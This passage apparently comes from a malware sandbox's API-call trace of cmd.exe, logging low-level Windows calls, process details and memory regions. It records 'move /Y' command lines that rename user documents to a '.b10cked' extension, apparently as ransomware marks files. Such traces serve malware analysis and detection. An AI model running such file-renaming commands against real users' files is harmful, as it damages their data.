lpBuffer=0x1efc28, lpFilePart=0x1efc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efc24*="Desktop") returned 0x18 [0234.815] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.815] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef9a4 | out: lpFindFileData=0x1ef9a4) returned 0x290010 [0234.815] FindClose (in: hFindFile=0x290010 | out: hFindFile=0x290010) returned 1 [0234.815] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef9a4 | out: lpFindFileData=0x1ef9a4) returned 0x290010 [0234.816] FindClose (in: hFindFile=0x290010 | out: hFindFile=0x290010) returned 1 [0234.816] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef9a4 | out: lpFindFileData=0x1ef9a4) returned 0x290010 [0234.816] FindClose (in: hFindFile=0x290010 | out: hFindFile=0x290010) returned 1 [0234.816] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.816] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.816] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.816] GetEnvironmentStringsW () returned 0x292af0* [0234.816] FreeEnvironmentStringsW (penv=0x292af0) returned 1 [0234.816] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.816] GetConsoleOutputCP () returned 0x1b5 [0234.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.817] GetUserDefaultLCID () returned 0x409 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efd68, cchData=128 | out: lpLCData="0") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd68, cchData=128 | out: lpLCData="0") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd68, cchData=128 | out: lpLCData="1") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.817] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.818] GetConsoleTitleW (in: lpConsoleTitle=0x2808e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.818] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.818] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.818] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.818] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.819] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.819] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.819] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.819] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.819] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.819] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.819] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.822] GetConsoleTitleW (in: lpConsoleTitle=0x1efa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.822] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.822] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.822] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.822] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.822] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.822] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.822] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.822] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.822] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.822] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.822] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.822] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.822] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.822] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.822] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.822] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.822] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.822] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.823] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.823] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.823] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.823] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.823] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.823] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.823] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.823] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.824] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef81c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef814, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef814*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.824] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.825] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2=".") returned 73 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2="..") returned 73 [0234.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt")) returned 0x20 [0234.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x291e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.826] SetErrorMode (uMode=0x0) returned 0x0 [0234.826] SetErrorMode (uMode=0x1) returned 0x0 [0234.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", nBufferLength=0x104, lpBuffer=0x1ef1a4, lpFilePart=0x1ef18c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", lpFilePart=0x1ef18c*="wj5G.ppt") returned 0x2b [0234.826] SetErrorMode (uMode=0x0) returned 0x1 [0234.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2=".") returned 73 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2="..") returned 73 [0234.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt")) returned 0x20 [0234.826] SetErrorMode (uMode=0x0) returned 0x0 [0234.826] SetErrorMode (uMode=0x1) returned 0x0 [0234.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", nBufferLength=0x104, lpBuffer=0x1ef620, lpFilePart=0x1ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", lpFilePart=0x1ef3b8*="wj5G.ppt") returned 0x2b [0234.826] SetErrorMode (uMode=0x0) returned 0x1 [0234.826] SetErrorMode (uMode=0x0) returned 0x0 [0234.827] SetErrorMode (uMode=0x1) returned 0x0 [0234.827] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1ef828, lpFilePart=0x1ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", lpFilePart=0x1ef3b8*="wj5G.ppt.b10cked") returned 0x33 [0234.827] SetErrorMode (uMode=0x0) returned 0x1 [0234.827] SetLastError (dwErrCode=0x0) [0234.827] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt.b10cked")) returned 0xffffffff [0234.827] GetLastError () returned 0x2 [0234.827] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", fInfoLevelId=0x1, lpFindFileData=0x1eed34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed34) returned 0x280e68 [0234.827] FindNextFileW (in: hFindFile=0x280e68, lpFindFileData=0x1eed34 | out: lpFindFileData=0x1eed34) returned 0 [0234.827] GetLastError () returned 0x12 [0234.827] FindClose (in: hFindFile=0x280e68 | out: hFindFile=0x280e68) returned 1 [0234.828] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", fInfoLevelId=0x1, lpFindFileData=0x291bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x291bd8) returned 0x280e68 [0234.828] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", lpFilePart=0x0) returned 0x33 [0234.828] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", nBufferLength=0x104, lpBuffer=0x1eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", lpFilePart=0x0) returned 0x2b [0234.828] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt")) returned 0x20 [0234.829] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt.b10cked"), dwFlags=0x3) returned 1 [0234.829] FindClose (in: hFindFile=0x280e68 | out: hFindFile=0x280e68) returned 1 [0234.829] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eef80 | out: _Buffer=" 1") returned 9 [0234.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.829] GetFileType (hFile=0x7) returned 0x2 [0235.358] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eef0c | out: lpMode=0x1eef0c) returned 1 [0235.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.359] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eef40 | out: lpConsoleScreenBufferInfo=0x1eef40) returned 1 [0235.359] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.359] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x1eef80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.359] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eef64, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x1eef64*=0x1a) returned 1 [0235.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.359] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.360] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.360] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.360] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.360] SetConsoleInputExeNameW () returned 0x1 [0235.360] GetConsoleOutputCP () returned 0x1b5 [0235.360] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.360] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.360] exit (_Code=0) Process: id = "639" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xa64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35098 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35099 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35100 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35101 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35102 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35103 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35104 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35105 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35106 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35107 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35619 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35620 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35621 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35622 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 35623 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 35624 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35625 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35626 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35627 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35628 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35629 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35630 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35631 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35632 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35633 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 35634 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35635 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35636 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35637 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35638 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35639 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35640 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 35641 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 35642 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Thread: id = 879 os_tid = 0xf08 [0235.819] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af864 | out: lpSystemTimeAsFileTime=0x2af864*(dwLowDateTime=0xc0068b20, dwHighDateTime=0x1d440a9)) [0235.819] GetCurrentProcessId () returned 0xa64 [0235.819] GetCurrentThreadId () returned 0xf08 [0235.819] GetTickCount () returned 0x40bb3 [0235.819] QueryPerformanceCounter (in: lpPerformanceCount=0x2af85c | out: lpPerformanceCount=0x2af85c*=29260864946) returned 1 [0235.820] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.820] __set_app_type (_Type=0x1) [0235.820] __p__fmode () returned 0x76b331f4 [0235.820] __p__commode () returned 0x76b331fc [0235.820] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.820] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.820] GetCurrentThreadId () returned 0xf08 [0235.820] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf08) returned 0x38 [0235.820] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.821] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.821] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.821] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.821] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7f4 | out: phkResult=0x2af7f4*=0x0) returned 0x2 [0235.821] VirtualQuery (in: lpAddress=0x2af82b, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, 